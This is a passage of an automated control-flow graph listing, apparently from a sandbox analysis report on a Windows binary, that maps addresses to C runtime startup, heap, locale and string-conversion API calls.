9781->9783 9888 7ffc6720309c 9782->9888 9783->9778 9786 7ffc67204053 9784->9786 9788 7ffc6720405b FreeEnvironmentStringsA 9786->9788 9789 7ffc67204069 __initmbctable 9786->9789 9788->9778 9792 7ffc67204077 FreeEnvironmentStringsA 9789->9792 9790 7ffc67203fce WideCharToMultiByte 9790->9783 9791 7ffc67203ff7 9790->9791 9793 7ffc67203024 free 45 API calls 9791->9793 9792->9778 9793->9781 9795 7ffc67203108 __wtomb_environ 45 API calls 9794->9795 9802 7ffc67203795 9795->9802 9796 7ffc67203981 GetStdHandle 9801 7ffc6720395b 9796->9801 9797 7ffc672039b0 GetFileType 9797->9801 9798 7ffc67203108 __wtomb_environ 45 API calls 9798->9802 9799 7ffc67203a10 SetHandleCount 9806 7ffc672021a7 9799->9806 9800 7ffc672038c4 9800->9801 9803 7ffc672038f7 GetFileType 9800->9803 9805 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 9800->9805 9800->9806 9801->9796 9801->9797 9801->9799 9804 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 9801->9804 9801->9806 9802->9798 9802->9800 9802->9801 9802->9806 9803->9800 9804->9801 9805->9800 9806->9736 9815 7ffc67203df4 9806->9815 9808 7ffc67202ca3 FlsFree 9807->9808 9809 7ffc67202cb0 9807->9809 9808->9809 9810 7ffc67206a2f DeleteCriticalSection 9809->9810 9811 7ffc67206a4d 9809->9811 9812 7ffc67203024 free 45 API calls 9810->9812 9813 7ffc67206a5b DeleteCriticalSection 9811->9813 9814 7ffc67206a6a 9811->9814 9812->9809 9813->9811 9814->9719 9816 7ffc67203e11 GetModuleFileNameA 9815->9816 9817 7ffc67203e0c 9815->9817 9819 7ffc67203e43 __setargv 9816->9819 10034 7ffc67204ecc 9817->10034 9820 7ffc6720309c __setargv 45 API calls 9819->9820 9821 7ffc67203e97 __setargv 9819->9821 9820->9821 9821->9739 9823 7ffc67203b09 9822->9823 9824 7ffc67203b0e _tzset 9822->9824 9825 7ffc67204ecc __initmbctable 83 API calls 9823->9825 9826 7ffc67203108 __wtomb_environ 45 API calls 9824->9826 9833 7ffc672021c0 9824->9833 9825->9824 9834 7ffc67203b4d _tzset 9826->9834 9827 7ffc67203bc6 9828 7ffc67203024 free 45 API calls 9827->9828 9828->9833 9829 7ffc67203108 __wtomb_environ 45 API calls 9829->9834 9830 7ffc67203c02 9831 7ffc67203024 free 45 API calls 9830->9831 9831->9833 9832 7ffc67207fbc _tzset 45 API calls 9832->9834 9833->9740 9837 7ffc6720347c 9833->9837 9834->9827 9834->9829 9834->9830 9834->9832 9834->9833 9835 7ffc67203ba2 9834->9835 9836 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9835->9836 9836->9834 9838 7ffc67203492 _cinit 9837->9838 10438 7ffc672073f4 9838->10438 9840 7ffc672034af _initterm_e 9842 7ffc672034d2 _cinit 9840->9842 10441 7ffc672073dc 9840->10441 9842->9740 9844 7ffc6720312d 9843->9844 9846 7ffc67202237 9844->9846 9847 7ffc6720314b Sleep 9844->9847 10458 7ffc67206cec 9844->10458 9846->9721 9846->9731 9847->9844 9847->9846 9848->9731 9850 7ffc67203a59 9849->9850 9851 7ffc67203aa8 9850->9851 9852 7ffc67203024 free 45 API calls 9850->9852 9853 7ffc67203a70 DeleteCriticalSection 9850->9853 9851->9736 9852->9850 9853->9850 9854->9731 9856 7ffc67206ba0 _lock 45 API calls 9855->9856 9857 7ffc67202d11 9856->9857 10467 7ffc67206a80 LeaveCriticalSection 9857->10467 9865 7ffc67203029 HeapFree 9864->9865 9869 7ffc67203059 free 9864->9869 9866 7ffc67203044 9865->9866 9865->9869 9867 7ffc672067e0 _errno 43 API calls 9866->9867 9868 7ffc67203049 GetLastError 9867->9868 9868->9869 9869->9731 9871 7ffc67202f88 9870->9871 9872 7ffc67202f64 9870->9872 9871->9731 9873 7ffc67202f69 FlsGetValue 9872->9873 9874 7ffc67202f78 FlsSetValue 9872->9874 9873->9874 10468 7ffc67202e18 9874->10468 9885 7ffc67202c5c EncodePointer 9876->9885 9878 7ffc672036fb _initp_misc_winsig 9879 7ffc6720755c EncodePointer 9878->9879 9880 7ffc6720373e EncodePointer 9879->9880 9880->9755 9884 7ffc67206993 9881->9884 9883 7ffc67202fb0 9883->9758 9883->9759 9884->9883 9886 7ffc67207ee4 InitializeCriticalSectionAndSpinCount 9884->9886 9887 7ffc67207f11 9886->9887 9887->9884 9889 7ffc672030b8 9888->9889 9891 7ffc672030f0 9889->9891 9892 7ffc672030d0 Sleep 9889->9892 9893 7ffc67206c34 9889->9893 9891->9781 9891->9790 9892->9889 9892->9891 9894 7ffc67206cc8 realloc 9893->9894 9902 7ffc67206c4c realloc 9893->9902 9897 7ffc672067e0 _errno 44 API calls 9894->9897 9895 7ffc67206c84 RtlAllocateHeap 9898 7ffc67206cbd 9895->9898 9895->9902 9897->9898 9898->9889 9899 7ffc67206cad 9952 7ffc672067e0 9899->9952 9902->9895 9902->9899 9903 7ffc67206cb2 9902->9903 9906 7ffc67206c64 9902->9906 9905 7ffc672067e0 _errno 44 API calls 9903->9905 9905->9898 9906->9895 9907 7ffc67207160 9906->9907 9916 7ffc67206f0c 9906->9916 9949 7ffc6720334c 9906->9949 9955 7ffc6720d2ac 9907->9955 9910 7ffc6720717d 9912 7ffc67206f0c _FF_MSGBANNER 45 API calls 9910->9912 9914 7ffc6720719e 9910->9914 9911 7ffc6720d2ac _FF_MSGBANNER 45 API calls 9911->9910 9913 7ffc67207194 9912->9913 9915 7ffc67206f0c _FF_MSGBANNER 45 API calls 9913->9915 9914->9906 9915->9914 9917 7ffc67206f2f 9916->9917 9918 7ffc6720d2ac _FF_MSGBANNER 42 API calls 9917->9918 9948 7ffc672070d4 9917->9948 9919 7ffc67206f51 9918->9919 9920 7ffc672070d6 GetStdHandle 9919->9920 9922 7ffc6720d2ac _FF_MSGBANNER 42 API calls 9919->9922 9921 7ffc672070e9 _tzset 9920->9921 9920->9948 9925 7ffc672070ff WriteFile 9921->9925 9921->9948 9923 7ffc67206f64 9922->9923 9923->9920 9924 7ffc67206f75 9923->9924 9924->9948 9974 7ffc67207fbc 9924->9974 9925->9948 9928 7ffc67206fb9 GetModuleFileNameA 9930 7ffc67206fd9 9928->9930 9936 7ffc6720700a _tzset 9928->9936 9929 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9929->9928 9931 7ffc67207fbc _tzset 42 API calls 9930->9931 9932 7ffc67206ff1 9931->9932 9935 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9932->9935 9932->9936 9933 7ffc67207065 9992 7ffc6720bdf4 9933->9992 9935->9936 9936->9933 9983 7ffc6720bf14 9936->9983 9939 7ffc67207090 9942 7ffc6720bdf4 _FF_MSGBANNER 42 API calls 9939->9942 9941 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9941->9939 9943 7ffc672070a6 9942->9943 9945 7ffc672070bf 9943->9945 9947 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9943->9947 9944 7ffc67206550 _invalid_parameter_noinfo 6 API calls 9944->9933 10001 7ffc6720d0b8 9945->10001 9947->9945 9948->9906 10019 7ffc67203310 GetModuleHandleW 9949->10019 10022 7ffc67202d70 GetLastError FlsGetValue 9952->10022 9954 7ffc672067e9 9954->9903 9956 7ffc6720d2b4 9955->9956 9957 7ffc6720716e 9956->9957 9958 7ffc672067e0 _errno 45 API calls 9956->9958 9957->9910 9957->9911 9959 7ffc6720d2d9 9958->9959 9961 7ffc672066d8 DecodePointer 9959->9961 9962 7ffc67206709 9961->9962 9963 7ffc67206723 _invalid_parameter_noinfo 9961->9963 9962->9957 9965 7ffc67206550 9963->9965 9972 7ffc672087a0 9965->9972 9968 7ffc672065ad 9969 7ffc6720660d IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 9968->9969 9970 7ffc67206658 GetCurrentProcess TerminateProcess 9969->9970 9971 7ffc6720664c _invalid_parameter_noinfo 9969->9971 9970->9962 9971->9970 9973 7ffc67206570 RtlCaptureContext 9972->9973 9973->9968 9975 7ffc67207fc7 9974->9975 9976 7ffc67207fd1 9974->9976 9975->9976 9979 7ffc67207ffd 9975->9979 9977 7ffc672067e0 _errno 45 API calls 9976->9977 9982 7ffc67207fd9 9977->9982 9978 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 9980 7ffc67206fa0 9978->9980 9979->9980 9981 7ffc672067e0 _errno 45 API calls 9979->9981 9980->9928 9980->9929 9981->9982 9982->9978 9987 7ffc6720bf22 9983->9987 9984 7ffc6720bf27 9985 7ffc672067e0 _errno 45 API calls 9984->9985 9986 7ffc6720704c 9984->9986 9991 7ffc6720bf51 9985->9991 9986->9933 9986->9944 9987->9984 9987->9986 9989 7ffc6720bf75 9987->9989 9988 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 9988->9986 9989->9986 9990 7ffc672067e0 _errno 45 API calls 9989->9990 9990->9991 9991->9988 9993 7ffc6720be0c 9992->9993 9995 7ffc6720be02 9992->9995 9994 7ffc672067e0 _errno 45 API calls 9993->9994 10000 7ffc6720be14 9994->10000 9995->9993 9997 7ffc6720be50 9995->9997 9996 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 9998 7ffc67207077 9996->9998 9997->9998 9999 7ffc672067e0 _errno 45 API calls 9997->9999 9998->9939 9998->9941 9999->10000 10000->9996 10018 7ffc67202c5c EncodePointer 10001->10018 10020 7ffc6720332a GetProcAddress 10019->10020 10021 7ffc6720333f ExitProcess 10019->10021 10020->10021 10023 7ffc67202d96 10022->10023 10024 7ffc67202dde SetLastError 10022->10024 10025 7ffc67203108 __wtomb_environ 40 API calls 10023->10025 10024->9954 10026 7ffc67202da3 10025->10026 10026->10024 10027 7ffc67202dab FlsSetValue 10026->10027 10028 7ffc67202dd7 10027->10028 10029 7ffc67202dc1 10027->10029 10031 7ffc67203024 free 40 API calls 10028->10031 10030 7ffc67202cbc __doserrno 40 API calls 10029->10030 10032 7ffc67202dc8 GetCurrentThreadId 10030->10032 10033 7ffc67202ddc 10031->10033 10032->10024 10033->10024 10035 7ffc67204ed9 10034->10035 10036 7ffc67204ee3 10034->10036 10038 7ffc67204cd4 10035->10038 10036->9816 10062 7ffc67202df4 10038->10062 10045 7ffc67204e81 10045->10036 10046 7ffc6720309c __setargv 45 API calls 10047 7ffc67204d24 __initmbctable 10046->10047 10047->10045 10085 7ffc67204a0c 10047->10085 10050 7ffc67204e83 10050->10045 10052 7ffc67204e9c 10050->10052 10055 7ffc67203024 free 45 API calls 10050->10055 10051 7ffc67204d5f 10054 7ffc67203024 free 45 API calls 10051->10054 10056 7ffc67204d84 10051->10056 10053 7ffc672067e0 _errno 45 API calls 10052->10053 10053->10045 10054->10056 10055->10052 10056->10045 10095 7ffc67206ba0 10056->10095 10063 7ffc67202d70 __doserrno 45 API calls 10062->10063 10064 7ffc67202dff 10063->10064 10065 7ffc67202e0f 10064->10065 10101 7ffc672032e0 10064->10101 10067 7ffc672048c0 10065->10067 10068 7ffc67202df4 _getptd 45 API calls 10067->10068 10069 7ffc672048cf 10068->10069 10070 7ffc672048ea 10069->10070 10071 7ffc67206ba0 _lock 45 API calls 10069->10071 10072 7ffc6720496e 10070->10072 10074 7ffc672032e0 _getptd 45 API calls 10070->10074 10075 7ffc672048fd 10071->10075 10078 7ffc6720497c 10072->10078 10074->10072 10076 7ffc67204934 10075->10076 10077 7ffc67203024 free 45 API calls 10075->10077 10106 7ffc67206a80 LeaveCriticalSection 10076->10106 10077->10076 10107 7ffc67202534 10078->10107 10081 7ffc672049c1 10083 7ffc672049ac 10081->10083 10084 7ffc672049c6 GetACP 10081->10084 10082 7ffc6720499c GetOEMCP 10082->10083 10083->10045 10083->10046 10084->10083 10086 7ffc6720497c __initmbctable 47 API calls 10085->10086 10088 7ffc67204a33 10086->10088 10087 7ffc67204a3b __initmbctable 10284 7ffc672020e0 10087->10284 10088->10087 10089 7ffc67204a8c IsValidCodePage 10088->10089 10094 7ffc67204ab2 _invalid_parameter_noinfo 10088->10094 10089->10087 10091 7ffc67204a9d GetCPInfo 10089->10091 10091->10087 10091->10094 10092 7ffc67204c6f 10092->10050 10092->10051 10274 7ffc672046dc GetCPInfo 10094->10274 10096 7ffc67206bcf EnterCriticalSection 10095->10096 10097 7ffc67206bbe 10095->10097 10412 7ffc67206ab8 10097->10412 10100 7ffc672032e0 _getptd 44 API calls 10100->10096 10102 7ffc67207160 _FF_MSGBANNER 44 API calls 10101->10102 10103 7ffc672032ed 10102->10103 10104 7ffc67206f0c _FF_MSGBANNER 44 API calls 10103->10104 10105 7ffc672032f4 DecodePointer 10104->10105 10108 7ffc6720254a 10107->10108 10114 7ffc672025ae 10107->10114 10109 7ffc67202df4 _getptd 45 API calls 10108->10109 10110 7ffc6720254f 10109->10110 10111 7ffc67202587 10110->10111 10115 7ffc6720524c 10110->10115 10113 7ffc672048c0 __initmbctable 45 API calls 10111->10113 10111->10114 10113->10114 10114->10081 10114->10082 10116 7ffc67202df4 _getptd 45 API calls 10115->10116 10117 7ffc67205257 10116->10117 10118 7ffc67205280 10117->10118 10120 7ffc67205272 10117->10120 10119 7ffc67206ba0 _lock 45 API calls 10118->10119 10121 7ffc6720528a 10119->10121 10122 7ffc67202df4 _getptd 45 API calls 10120->10122 10129 7ffc672051f4 10121->10129 10124 7ffc67205277 10122->10124 10127 7ffc672052b8 10124->10127 10128 7ffc672032e0 _getptd 45 API calls 10124->10128 10127->10111 10128->10127 10130 7ffc6720523e 10129->10130 10131 7ffc67205202 ___lc_collate_cp_func 10129->10131 10133 7ffc67206a80 LeaveCriticalSection 10130->10133 10131->10130 10134 7ffc67204f04 10131->10134 10135 7ffc67204f9b 10134->10135 10141 7ffc67204f22 10134->10141 10136 7ffc67204fee 10135->10136 10137 7ffc67203024 free 45 API calls 10135->10137 10153 7ffc6720501b 10136->10153 10186 7ffc672098a4 10136->10186 10138 7ffc67204fbf 10137->10138 10142 7ffc67203024 free 45 API calls 10138->10142 10140 7ffc67204f61 10143 7ffc67204f83 10140->10143 10154 7ffc67203024 free 45 API calls 10140->10154 10141->10135 10141->10140 10145 7ffc67203024 free 45 API calls 10141->10145 10146 7ffc67204fd3 10142->10146 10148 7ffc67203024 free 45 API calls 10143->10148 10150 7ffc67204f55 10145->10150 10152 7ffc67203024 free 45 API calls 10146->10152 10147 7ffc67205067 10155 7ffc67204f8f 10148->10155 10149 7ffc67203024 free 45 API calls 10149->10153 10162 7ffc67209df8 10150->10162 10151 7ffc67203024 45 API calls free 10151->10153 10157 7ffc67204fe2 10152->10157 10153->10147 10153->10151 10158 7ffc67204f77 10154->10158 10159 7ffc67203024 free 45 API calls 10155->10159 10160 7ffc67203024 free 45 API calls 10157->10160 10178 7ffc67209b68 10158->10178 10159->10135 10160->10136 10163 7ffc67209e87 10162->10163 10164 7ffc67209e01 10162->10164 10163->10140 10165 7ffc67209e1b 10164->10165 10166 7ffc67203024 free 45 API calls 10164->10166 10167 7ffc67209e2d 10165->10167 10169 7ffc67203024 free 45 API calls 10165->10169 10166->10165 10168 7ffc67209e3f 10167->10168 10170 7ffc67203024 free 45 API calls 10167->10170 10171 7ffc67209e51 10168->10171 10172 7ffc67203024 free 45 API calls 10168->10172 10169->10167 10170->10168 10173 7ffc67209e63 10171->10173 10174 7ffc67203024 free 45 API calls 10171->10174 10172->10171 10175 7ffc67209e75 10173->10175 10176 7ffc67203024 free 45 API calls 10173->10176 10174->10173 10175->10163 10177 7ffc67203024 free 45 API calls 10175->10177 10176->10175 10177->10163 10179 7ffc67209b6d 10178->10179 10184 7ffc67209baa 10178->10184 10180 7ffc67209b86 10179->10180 10181 7ffc67203024 free 45 API calls 10179->10181 10182 7ffc67209b98 10180->10182 10183 7ffc67203024 free 45 API calls 10180->10183 10181->10180 10182->10184 10185 7ffc67203024 free 45 API calls 10182->10185 10183->10182 10184->10143 10185->10184 10187 7ffc6720500f 10186->10187 10188 7ffc672098ad 10186->10188 10187->10149 10189 7ffc67203024 free 45 API calls 10188->10189 10190 7ffc672098be 10189->10190 10191 7ffc67203024 free 45 API calls 10190->10191 10192 7ffc672098c7 10191->10192 10193 7ffc67203024 free 45 API calls 10192->10193 10194 7ffc672098d0 10193->10194 10195 7ffc67203024 free 45 API calls 10194->10195 10196 7ffc672098d9 10195->10196 10197 7ffc67203024 free 45 API calls 10196->10197 10198 7ffc672098e2 10197->10198 10199 7ffc67203024 free 45 API calls 10198->10199 10200 7ffc672098eb 10199->10200 10201 7ffc67203024 free 45 API calls 10200->10201 10202 7ffc672098f3 10201->10202 10203 7ffc67203024 free 45 API calls 10202->10203 10204 7ffc672098fc 10203->10204 10205 7ffc67203024 free 45 API calls 10204->10205 10206 7ffc67209905 10205->10206 10207 7ffc67203024 free 45 API calls 10206->10207 10208 7ffc6720990e 10207->10208 10209 7ffc67203024 free 45 API calls 10208->10209 10210 7ffc67209917 10209->10210 10211 7ffc67203024 free 45 API calls 10210->10211 10212 7ffc67209920 10211->10212 10213 7ffc67203024 free 45 API calls 10212->10213 10214 7ffc67209929 10213->10214 10215 7ffc67203024 free 45 API calls 10214->10215 10216 7ffc67209932 10215->10216 10217 7ffc67203024 free 45 API calls 10216->10217 10218 7ffc6720993b 10217->10218 10219 7ffc67203024 free 45 API calls 10218->10219 10220 7ffc67209944 10219->10220 10221 7ffc67203024 free 45 API calls 10220->10221 10222 7ffc67209950 10221->10222 10223 7ffc67203024 free 45 API calls 10222->10223 10224 7ffc6720995c 10223->10224 10225 7ffc67203024 free 45 API calls 10224->10225 10226 7ffc67209968 10225->10226 10227 7ffc67203024 free 45 API calls 10226->10227 10228 7ffc67209974 10227->10228 10229 7ffc67203024 free 45 API calls 10228->10229 10230 7ffc67209980 10229->10230 10231 7ffc67203024 free 45 API calls 10230->10231 10232 7ffc6720998c 10231->10232 10233 7ffc67203024 free 45 API calls 10232->10233 10234 7ffc67209998 10233->10234 10235 7ffc67203024 free 45 API calls 10234->10235 10236 7ffc672099a4 10235->10236 10237 7ffc67203024 free 45 API calls 10236->10237 10238 7ffc672099b0 10237->10238 10239 7ffc67203024 free 45 API calls 10238->10239 10240 7ffc672099bc 10239->10240 10241 7ffc67203024 free 45 API calls 10240->10241 10242 7ffc672099c8 10241->10242 10243 7ffc67203024 free 45 API calls 10242->10243 10244 7ffc672099d4 10243->10244 10245 7ffc67203024 free 45 API calls 10244->10245 10246 7ffc672099e0 10245->10246 10247 7ffc67203024 free 45 API calls 10246->10247 10248 7ffc672099ec 10247->10248 10249 7ffc67203024 free 45 API calls 10248->10249 10250 7ffc672099f8 10249->10250 10251 7ffc67203024 free 45 API calls 10250->10251 10252 7ffc67209a04 10251->10252 10253 7ffc67203024 free 45 API calls 10252->10253 10254 7ffc67209a10 10253->10254 10255 7ffc67203024 free 45 API calls 10254->10255 10256 7ffc67209a1c 10255->10256 10257 7ffc67203024 free 45 API calls 10256->10257 10258 7ffc67209a28 10257->10258 10259 7ffc67203024 free 45 API calls 10258->10259 10260 7ffc67209a34 10259->10260 10261 7ffc67203024 free 45 API calls 10260->10261 10262 7ffc67209a40 10261->10262 10263 7ffc67203024 free 45 API calls 10262->10263 10264 7ffc67209a4c 10263->10264 10265 7ffc67203024 free 45 API calls 10264->10265 10266 7ffc67209a58 10265->10266 10267 7ffc67203024 free 45 API calls 10266->10267 10268 7ffc67209a64 10267->10268 10269 7ffc67203024 free 45 API calls 10268->10269 10270 7ffc67209a70 10269->10270 10271 7ffc67203024 free 45 API calls 10270->10271 10272 7ffc67209a7c 10271->10272 10273 7ffc67203024 free 45 API calls 10272->10273 10273->10187 10275 7ffc6720480a 10274->10275 10276 7ffc6720471e _invalid_parameter_noinfo 10274->10276 10279 7ffc672020e0 __initmbctable 8 API calls 10275->10279 10295 7ffc672091a0 10276->10295 10281 7ffc672048aa 10279->10281 10281->10087 10283 7ffc67208e9c __initmbctable 78 API calls 10283->10275 10285 7ffc672020e9 10284->10285 10286 7ffc672020f4 10285->10286 10287 7ffc672023e8 RtlCaptureContext RtlLookupFunctionEntry 10285->10287 10286->10092 10288 7ffc6720246d 10287->10288 10289 7ffc6720242c RtlVirtualUnwind 10287->10289 10290 7ffc6720248f IsDebuggerPresent 10288->10290 10289->10290 10411 7ffc6720460c 10290->10411 10292 7ffc672024ee SetUnhandledExceptionFilter UnhandledExceptionFilter 10293 7ffc67202516 GetCurrentProcess TerminateProcess 10292->10293 10294 7ffc6720250c _invalid_parameter_noinfo 10292->10294 10293->10092 10294->10293 10296 7ffc67202534 _wcstoui64_l 45 API calls 10295->10296 10297 7ffc672091c4 10296->10297 10305 7ffc67208f34 10297->10305 10300 7ffc67208e9c 10301 7ffc67202534 _wcstoui64_l 45 API calls 10300->10301 10302 7ffc67208ec0 10301->10302 10364 7ffc6720895c 10302->10364 10306 7ffc67208fc1 10305->10306 10307 7ffc67208f84 GetStringTypeW 10305->10307 10308 7ffc67208f9e 10306->10308 10310 7ffc672090f0 10306->10310 10307->10308 10309 7ffc67208fa6 GetLastError 10307->10309 10311 7ffc67208fea MultiByteToWideChar 10308->10311 10320 7ffc672090e9 10308->10320 10309->10306 10329 7ffc6720e1e8 GetLocaleInfoA 10310->10329 10315 7ffc67209018 10311->10315 10311->10320 10313 7ffc672020e0 __initmbctable 8 API calls 10316 7ffc672047a1 10313->10316 10318 7ffc6720903d _invalid_parameter_noinfo _Wcsftime 10315->10318 10321 7ffc67206c34 realloc 45 API calls 10315->10321 10316->10300 10317 7ffc6720914b GetStringTypeA 10319 7ffc6720916e 10317->10319 10317->10320 10318->10320 10325 7ffc672090a4 MultiByteToWideChar 10318->10325 10324 7ffc67203024 free 45 API calls 10319->10324 10320->10313 10321->10318 10324->10320 10326 7ffc672090c6 GetStringTypeW 10325->10326 10327 7ffc672090db 10325->10327 10326->10327 10327->10320 10328 7ffc67203024 free 45 API calls 10327->10328 10328->10320 10330 7ffc6720e21f 10329->10330 10331 7ffc6720e21a 10329->10331 10360 7ffc67202100 10330->10360 10333 7ffc672020e0 __initmbctable 8 API calls 10331->10333 10334 7ffc6720911a 10333->10334 10334->10317 10334->10320 10335 7ffc6720e23c 10334->10335 10336 7ffc6720e28e GetCPInfo 10335->10336 10341 7ffc6720e366 10335->10341 10337 7ffc6720e33f MultiByteToWideChar 10336->10337 10338 7ffc6720e2a0 10336->10338 10337->10341 10344 7ffc6720e2c5 _tzset 10337->10344 10338->10337 10340 7ffc6720e2aa GetCPInfo 10338->10340 10339 7ffc672020e0 __initmbctable 8 API calls 10342 7ffc67209140 10339->10342 10340->10337 10343 7ffc6720e2bf 10340->10343 10341->10339 10342->10317 10342->10320 10343->10337 10343->10344 10345 7ffc67206c34 realloc 45 API calls 10344->10345 10346 7ffc6720e301 _invalid_parameter_noinfo _Wcsftime 10344->10346 10345->10346 10346->10341 10347 7ffc6720e39d MultiByteToWideChar 10346->10347 10348 7ffc6720e3ff 10347->10348 10349 7ffc6720e3c7 10347->10349 10348->10341 10354 7ffc67203024 free 45 API calls 10348->10354 10350 7ffc6720e3cc WideCharToMultiByte 10349->10350 10351 7ffc6720e407 10349->10351 10350->10348 10352 7ffc6720e40d WideCharToMultiByte 10351->10352 10353 7ffc6720e439 10351->10353 10352->10348 10352->10353 10355 7ffc67203108 __wtomb_environ 45 API calls 10353->10355 10354->10341 10356 7ffc6720e446 10355->10356 10356->10348 10357 7ffc6720e44e WideCharToMultiByte 10356->10357 10357->10348 10358 7ffc6720e477 10357->10358 10359 7ffc67203024 free 45 API calls 10358->10359 10359->10348 10361 7ffc6720287c 10360->10361 10362 7ffc672025f8 _wcstoui64_l 67 API calls 10361->10362 10363 7ffc672028a7 10362->10363 10363->10331 10365 7ffc672089b4 LCMapStringW 10364->10365 10368 7ffc672089d8 10364->10368 10366 7ffc672089e4 GetLastError 10365->10366 10365->10368 10366->10368 10367 7ffc67208ca6 10371 7ffc6720e1e8 _wcstoui64_l 67 API calls 10367->10371 10368->10367 10369 7ffc67208a53 10368->10369 10370 7ffc67208c9f 10369->10370 10372 7ffc67208a71 MultiByteToWideChar 10369->10372 10373 7ffc672020e0 __initmbctable 8 API calls 10370->10373 10374 7ffc67208cd4 10371->10374 10372->10370 10379 7ffc67208aa0 10372->10379 10375 7ffc672047d4 10373->10375 10374->10370 10376 7ffc67208e2f LCMapStringA 10374->10376 10377 7ffc67208cf3 10374->10377 10375->10283 10396 7ffc67208d3b 10376->10396 10380 7ffc6720e23c _wcstoui64_l 60 API calls 10377->10380 10378 7ffc67208b1c MultiByteToWideChar 10381 7ffc67208c91 10378->10381 10382 7ffc67208b46 LCMapStringW 10378->10382 10384 7ffc67208ad1 _Wcsftime 10379->10384 10385 7ffc67206c34 realloc 45 API calls 10379->10385 10386 7ffc67208d0b 10380->10386 10381->10370 10390 7ffc67203024 free 45 API calls 10381->10390 10382->10381 10383 7ffc67208b70 10382->10383 10387 7ffc67208b7b 10383->10387 10395 7ffc67208bb6 10383->10395 10384->10370 10384->10378 10385->10384 10386->10370 10388 7ffc67208d13 LCMapStringA 10386->10388 10387->10381 10392 7ffc67208b92 LCMapStringW 10387->10392 10388->10396 10397 7ffc67208d42 10388->10397 10389 7ffc67208e5f 10389->10370 10393 7ffc67203024 free 45 API calls 10389->10393 10390->10370 10391 7ffc67203024 free 45 API calls 10391->10389 10392->10381 10393->10370 10394 7ffc67208c23 LCMapStringW 10398 7ffc67208c83 10394->10398 10399 7ffc67208c44 WideCharToMultiByte 10394->10399 10400 7ffc67206c34 realloc 45 API calls 10395->10400 10404 7ffc67208bd4 _Wcsftime 10395->10404 10396->10389 10396->10391 10402 7ffc67208d63 _invalid_parameter_noinfo _Wcsftime 10397->10402 10403 7ffc67206c34 realloc 45 API calls 10397->10403 10398->10381 10408 7ffc67203024 free 45 API calls 10398->10408 10399->10398 10400->10404 10401 7ffc67208dc5 LCMapStringA 10405 7ffc67208ded 10401->10405 10406 7ffc67208df1 10401->10406 10402->10396 10402->10401 10403->10402 10404->10381 10404->10394 10405->10396 10410 7ffc67203024 free 45 API calls 10405->10410 10409 7ffc6720e23c _wcstoui64_l 60 API calls 10406->10409 10408->10381 10409->10405 10410->10396 10411->10292 10413 7ffc67206af6 10412->10413 10414 7ffc67206adf 10412->10414 10416 7ffc6720309c __setargv 44 API calls 10413->10416 10426 7ffc67206b0b 10413->10426 10415 7ffc67207160 _FF_MSGBANNER 44 API calls 10414->10415 10417 7ffc67206ae4 10415->10417 10418 7ffc67206b19 10416->10418 10419 7ffc67206f0c _FF_MSGBANNER 44 API calls 10417->10419 10420 7ffc67206b21 10418->10420 10421 7ffc67206b30 10418->10421 10422 7ffc67206aec 10419->10422 10423 7ffc672067e0 _errno 44 API calls 10420->10423 10424 7ffc67206ba0 _lock 44 API calls 10421->10424 10425 7ffc6720334c realloc 3 API calls 10422->10425 10423->10426 10427 7ffc67206b3a 10424->10427 10425->10413 10426->10096 10426->10100 10428 7ffc67206b43 10427->10428 10429 7ffc67206b72 10427->10429 10431 7ffc67207ee4 _lock InitializeCriticalSectionAndSpinCount 10428->10431 10430 7ffc67203024 free 44 API calls 10429->10430 10432 7ffc67206b61 LeaveCriticalSection 10430->10432 10433 7ffc67206b50 10431->10433 10432->10426 10433->10432 10435 7ffc67203024 free 44 API calls 10433->10435 10436 7ffc67206b5c 10435->10436 10437 7ffc672067e0 _errno 44 API calls 10436->10437 10437->10432 10439 7ffc6720740a EncodePointer 10438->10439 10439->10439 10440 7ffc6720741f 10439->10440 10440->9840 10444 7ffc672072d4 10441->10444 10457 7ffc67203364 10444->10457 10459 7ffc67206d01 10458->10459 10461 7ffc67206d33 realloc 10458->10461 10460 7ffc67206d0f 10459->10460 10459->10461 10462 7ffc672067e0 _errno 44 API calls 10460->10462 10463 7ffc67206d4b RtlAllocateHeap 10461->10463 10465 7ffc67206d2f 10461->10465 10464 7ffc67206d14 10462->10464 10463->10461 10463->10465 10466 7ffc672066d8 _invalid_parameter_noinfo 7 API calls 10464->10466 10465->9844 10466->10465 10469 7ffc67202e21 10468->10469 10496 7ffc67202f42 10468->10496 10470 7ffc67202e3c 10469->10470 10471 7ffc67203024 free 45 API calls 10469->10471 10472 7ffc67202e4a 10470->10472 10473 7ffc67203024 free 45 API calls 10470->10473 10471->10470 10474 7ffc67202e58 10472->10474 10475 7ffc67203024 free 45 API calls 10472->10475 10473->10472 10476 7ffc67202e66 10474->10476 10477 7ffc67203024 free 45 API calls 10474->10477 10475->10474 10478 7ffc67202e74 10476->10478 10480 7ffc67203024 free 45 API calls 10476->10480 10477->10476 10479 7ffc67202e82 10478->10479 10481 7ffc67203024 free 45 API calls 10478->10481 10482 7ffc67202e93 10479->10482 10483 7ffc67203024 free 45 API calls 10479->10483 10480->10478 10481->10479 10484 7ffc67202eab 10482->10484 10485 7ffc67203024 free 45 API calls 10482->10485 10483->10482 10486 7ffc67206ba0 _lock 45 API calls 10484->10486 10485->10484 10490 7ffc67202eb5 10486->10490 10487 7ffc67202ee3 10500 7ffc67206a80 LeaveCriticalSection 10487->10500 10490->10487 10492 7ffc67203024 free 45 API calls 10490->10492 10492->10487 10496->9871 10501 7ffc67202050 10504 7ffc671c1000 10501->10504 10505 7ffc671c101e ExitProcess 10504->10505

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
